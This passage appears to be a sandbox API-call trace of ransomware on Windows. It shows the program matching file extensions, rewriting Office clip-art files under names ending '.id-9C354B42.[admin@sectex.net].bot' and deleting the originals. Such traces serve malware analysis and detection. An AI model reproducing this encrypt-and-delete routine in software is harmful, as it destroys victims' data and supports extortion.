	[0159.235] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105710.WMF") returned 63
	[0159.235] lstrlenW (lpString=".dbf") returned 4
	[0159.235] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0159.235] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105710.WMF") returned 63
	[0159.235] lstrlenW (lpString=".1cd") returned 4
	[0159.236] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0159.236] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105710.WMF") returned 63
	[0159.236] lstrlenW (lpString=".jpg") returned 4
	[0159.236] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0159.236] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0159.236] lstrlenW (lpString="J0105846.WMF") returned 12
	[0159.236] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105846.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105846.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d8
	[0159.479] GetFileSizeEx (in: hFile=0x3d8, lpFileSize=0xa54ff1c | out: lpFileSize=0xa54ff1c*=8240) returned 1
	[0159.479] CloseHandle (hObject=0x3d8) returned 1
	[0159.479] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105846.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105846.wmf")) returned 0x20
	[0159.509] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105846.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105846.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0159.509] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105846.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105846.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x25c
	[0159.509] SetFilePointerEx (in: hFile=0x25c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0159.509] SetFilePointerEx (in: hFile=0x25c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0159.509] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105846.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105846.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f0
	[0159.510] GetLastError () returned 0x0
	[0159.510] ReadFile (in: hFile=0x25c, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x2030, lpOverlapped=0x0) returned 1
	[0159.528] WriteFile (in: hFile=0x3f0, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0x2040, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0x2040, lpOverlapped=0x0) returned 1
	[0159.529] ReadFile (in: hFile=0x25c, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x0, lpOverlapped=0x0) returned 1
	[0159.529] WriteFile (in: hFile=0x3f0, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0159.530] SetEndOfFile (hFile=0x3f0) returned 1
	[0159.530] CloseHandle (hObject=0x3f0) returned 1
	[0159.530] SetFilePointerEx (in: hFile=0x25c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0159.530] SetEndOfFile (hFile=0x25c) returned 1
	[0159.533] CloseHandle (hObject=0x25c) returned 1
	[0159.534] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105846.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0159.585] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105846.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105846.wmf")) returned 1
	[0159.586] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105846.WMF") returned 63
	[0159.586] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105846.WMF") returned 63
	[0159.586] lstrlenW (lpString=".doc") returned 4
	[0159.586] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0159.586] lstrlenW (lpString=".docx") returned 5
	[0159.586] lstrcmpiW (lpString1=".docx", lpString2="6.WMF") returned -1
	[0159.586] lstrlenW (lpString=".pdf") returned 4
	[0159.586] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0159.586] lstrlenW (lpString=".xls") returned 4
	[0159.586] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0159.586] lstrlenW (lpString=".xlsx") returned 5
	[0159.586] lstrcmpiW (lpString1=".xlsx", lpString2="6.WMF") returned -1
	[0159.586] lstrlenW (lpString=".ppt") returned 4
	[0159.586] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0159.586] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105846.WMF") returned 63
	[0159.586] lstrlenW (lpString=".zip") returned 4
	[0159.586] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0159.586] lstrlenW (lpString=".rar") returned 4
	[0159.586] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0159.586] lstrlenW (lpString=".bz2") returned 4
	[0159.586] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0159.586] lstrlenW (lpString=".7z") returned 3
	[0159.586] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0159.586] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105846.WMF") returned 63
	[0159.586] lstrlenW (lpString=".dbf") returned 4
	[0159.587] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0159.587] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105846.WMF") returned 63
	[0159.587] lstrlenW (lpString=".1cd") returned 4
	[0159.587] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0159.587] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105846.WMF") returned 63
	[0159.587] lstrlenW (lpString=".jpg") returned 4
	[0159.587] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0159.587] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105846.WMF") returned 63
	[0159.587] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105846.WMF") returned 63
	[0159.587] lstrlenW (lpString=".doc") returned 4
	[0159.587] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0159.587] lstrlenW (lpString=".docx") returned 5
	[0159.587] lstrcmpiW (lpString1=".docx", lpString2="6.WMF") returned -1
	[0159.587] lstrlenW (lpString=".pdf") returned 4
	[0159.587] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0159.587] lstrlenW (lpString=".xls") returned 4
	[0159.587] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0159.587] lstrlenW (lpString=".xlsx") returned 5
	[0159.587] lstrcmpiW (lpString1=".xlsx", lpString2="6.WMF") returned -1
	[0159.587] lstrlenW (lpString=".ppt") returned 4
	[0159.587] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0159.587] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105846.WMF") returned 63
	[0159.587] lstrlenW (lpString=".zip") returned 4
	[0159.587] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0159.587] lstrlenW (lpString=".rar") returned 4
	[0159.587] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0159.587] lstrlenW (lpString=".bz2") returned 4
	[0159.587] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0159.587] lstrlenW (lpString=".7z") returned 3
	[0159.587] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0159.588] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105846.WMF") returned 63
	[0159.588] lstrlenW (lpString=".dbf") returned 4
	[0159.588] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0159.588] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105846.WMF") returned 63
	[0159.588] lstrlenW (lpString=".1cd") returned 4
	[0159.588] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0159.588] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105846.WMF") returned 63
	[0159.588] lstrlenW (lpString=".jpg") returned 4
	[0159.588] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0159.588] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0159.588] lstrlenW (lpString="J0106222.WMF") returned 12
	[0159.588] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106222.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0106222.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f0
	[0159.623] GetFileSizeEx (in: hFile=0x3f0, lpFileSize=0xa54ff1c | out: lpFileSize=0xa54ff1c*=19600) returned 1
	[0159.623] CloseHandle (hObject=0x3f0) returned 1
	[0159.623] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106222.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0106222.wmf")) returned 0x20
	[0159.655] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106222.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0106222.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0159.655] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106222.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0106222.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d0
	[0159.655] SetFilePointerEx (in: hFile=0x3d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0159.655] SetFilePointerEx (in: hFile=0x3d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0159.655] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106222.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0106222.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c4
	[0159.656] GetLastError () returned 0x0
	[0159.656] ReadFile (in: hFile=0x3d0, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x4c90, lpOverlapped=0x0) returned 1
	[0159.658] WriteFile (in: hFile=0x3c4, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0x4ca0, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0x4ca0, lpOverlapped=0x0) returned 1
	[0159.659] ReadFile (in: hFile=0x3d0, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x0, lpOverlapped=0x0) returned 1
	[0159.659] WriteFile (in: hFile=0x3c4, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0159.660] SetEndOfFile (hFile=0x3c4) returned 1
	[0159.660] CloseHandle (hObject=0x3c4) returned 1
	[0159.660] SetFilePointerEx (in: hFile=0x3d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0159.660] SetEndOfFile (hFile=0x3d0) returned 1
	[0159.664] CloseHandle (hObject=0x3d0) returned 1
	[0159.664] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106222.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0159.664] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106222.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0106222.wmf")) returned 1
	[0159.665] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106222.WMF") returned 63
	[0159.665] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106222.WMF") returned 63
	[0159.665] lstrlenW (lpString=".doc") returned 4
	[0159.665] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0159.665] lstrlenW (lpString=".docx") returned 5
	[0159.665] lstrcmpiW (lpString1=".docx", lpString2="2.WMF") returned -1
	[0159.665] lstrlenW (lpString=".pdf") returned 4
	[0159.665] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0159.665] lstrlenW (lpString=".xls") returned 4
	[0159.665] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0159.665] lstrlenW (lpString=".xlsx") returned 5
	[0159.665] lstrcmpiW (lpString1=".xlsx", lpString2="2.WMF") returned -1
	[0159.665] lstrlenW (lpString=".ppt") returned 4
	[0159.665] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0159.665] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106222.WMF") returned 63
	[0159.665] lstrlenW (lpString=".zip") returned 4
	[0159.665] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0159.665] lstrlenW (lpString=".rar") returned 4
	[0159.665] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0159.665] lstrlenW (lpString=".bz2") returned 4
	[0159.665] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0159.665] lstrlenW (lpString=".7z") returned 3
	[0159.665] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0159.665] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106222.WMF") returned 63
	[0159.665] lstrlenW (lpString=".dbf") returned 4
	[0159.666] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0159.666] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106222.WMF") returned 63
	[0159.666] lstrlenW (lpString=".1cd") returned 4
	[0159.666] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0159.666] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106222.WMF") returned 63
	[0159.666] lstrlenW (lpString=".jpg") returned 4
	[0159.666] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0159.666] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106222.WMF") returned 63
	[0159.666] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106222.WMF") returned 63
	[0159.666] lstrlenW (lpString=".doc") returned 4
	[0159.666] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0159.666] lstrlenW (lpString=".docx") returned 5
	[0159.666] lstrcmpiW (lpString1=".docx", lpString2="2.WMF") returned -1
	[0159.666] lstrlenW (lpString=".pdf") returned 4
	[0159.666] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0159.666] lstrlenW (lpString=".xls") returned 4
	[0159.666] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0159.666] lstrlenW (lpString=".xlsx") returned 5
	[0159.666] lstrcmpiW (lpString1=".xlsx", lpString2="2.WMF") returned -1
	[0159.666] lstrlenW (lpString=".ppt") returned 4
	[0159.666] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0159.666] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106222.WMF") returned 63
	[0159.666] lstrlenW (lpString=".zip") returned 4
	[0159.666] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0159.666] lstrlenW (lpString=".rar") returned 4
	[0159.666] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0159.666] lstrlenW (lpString=".bz2") returned 4
	[0159.666] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0159.666] lstrlenW (lpString=".7z") returned 3
	[0159.667] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0159.667] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106222.WMF") returned 63
	[0159.667] lstrlenW (lpString=".dbf") returned 4
	[0159.667] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0159.667] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106222.WMF") returned 63
	[0159.667] lstrlenW (lpString=".1cd") returned 4
	[0159.667] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0159.667] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106222.WMF") returned 63
	[0159.667] lstrlenW (lpString=".jpg") returned 4
	[0159.667] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0159.667] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0159.667] lstrlenW (lpString="J0106816.WMF") returned 12
	[0159.667] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106816.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0106816.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d0
	[0159.668] GetFileSizeEx (in: hFile=0x3d0, lpFileSize=0xa54ff1c | out: lpFileSize=0xa54ff1c*=3332) returned 1
	[0159.668] CloseHandle (hObject=0x3d0) returned 1
	[0159.668] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106816.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0106816.wmf")) returned 0x20
	[0159.668] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106816.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0106816.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0159.668] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106816.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0106816.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d0
	[0159.668] SetFilePointerEx (in: hFile=0x3d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0159.668] SetFilePointerEx (in: hFile=0x3d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0159.668] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106816.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0106816.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c4
	[0159.669] GetLastError () returned 0x0
	[0159.669] ReadFile (in: hFile=0x3d0, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0xd04, lpOverlapped=0x0) returned 1
	[0159.671] WriteFile (in: hFile=0x3c4, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0xd10, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0xd10, lpOverlapped=0x0) returned 1
	[0159.672] ReadFile (in: hFile=0x3d0, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x0, lpOverlapped=0x0) returned 1
	[0159.672] WriteFile (in: hFile=0x3c4, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0159.672] SetEndOfFile (hFile=0x3c4) returned 1
	[0159.672] CloseHandle (hObject=0x3c4) returned 1
	[0159.672] SetFilePointerEx (in: hFile=0x3d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0159.672] SetEndOfFile (hFile=0x3d0) returned 1
	[0159.675] CloseHandle (hObject=0x3d0) returned 1
	[0159.675] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106816.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0159.675] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106816.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0106816.wmf")) returned 1
	[0159.676] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106816.WMF") returned 63
	[0159.676] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106816.WMF") returned 63
	[0159.676] lstrlenW (lpString=".doc") returned 4
	[0159.676] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0159.676] lstrlenW (lpString=".docx") returned 5
	[0159.676] lstrcmpiW (lpString1=".docx", lpString2="6.WMF") returned -1
	[0159.676] lstrlenW (lpString=".pdf") returned 4
	[0159.677] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0159.677] lstrlenW (lpString=".xls") returned 4
	[0159.677] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0159.677] lstrlenW (lpString=".xlsx") returned 5
	[0159.677] lstrcmpiW (lpString1=".xlsx", lpString2="6.WMF") returned -1
	[0159.677] lstrlenW (lpString=".ppt") returned 4
	[0159.677] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0159.677] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106816.WMF") returned 63
	[0159.677] lstrlenW (lpString=".zip") returned 4
	[0159.677] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0159.677] lstrlenW (lpString=".rar") returned 4
	[0159.677] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0159.677] lstrlenW (lpString=".bz2") returned 4
	[0159.677] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0159.677] lstrlenW (lpString=".7z") returned 3
	[0159.677] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0159.677] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106816.WMF") returned 63
	[0159.677] lstrlenW (lpString=".dbf") returned 4
	[0159.677] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0159.677] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106816.WMF") returned 63
	[0159.677] lstrlenW (lpString=".1cd") returned 4
	[0159.677] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0159.677] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106816.WMF") returned 63
	[0159.677] lstrlenW (lpString=".jpg") returned 4
	[0159.677] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0159.677] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106816.WMF") returned 63
	[0159.677] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106816.WMF") returned 63
	[0159.677] lstrlenW (lpString=".doc") returned 4
	[0159.678] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0159.678] lstrlenW (lpString=".docx") returned 5
	[0159.678] lstrcmpiW (lpString1=".docx", lpString2="6.WMF") returned -1
	[0159.678] lstrlenW (lpString=".pdf") returned 4
	[0159.678] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0159.678] lstrlenW (lpString=".xls") returned 4
	[0159.678] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0159.678] lstrlenW (lpString=".xlsx") returned 5
	[0159.678] lstrcmpiW (lpString1=".xlsx", lpString2="6.WMF") returned -1
	[0159.678] lstrlenW (lpString=".ppt") returned 4
	[0159.678] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0159.678] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106816.WMF") returned 63
	[0159.678] lstrlenW (lpString=".zip") returned 4
	[0159.678] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0159.678] lstrlenW (lpString=".rar") returned 4
	[0159.678] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0159.678] lstrlenW (lpString=".bz2") returned 4
	[0159.678] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0159.678] lstrlenW (lpString=".7z") returned 3
	[0159.678] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0159.678] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106816.WMF") returned 63
	[0159.678] lstrlenW (lpString=".dbf") returned 4
	[0159.678] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0159.678] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106816.WMF") returned 63
	[0159.678] lstrlenW (lpString=".1cd") returned 4
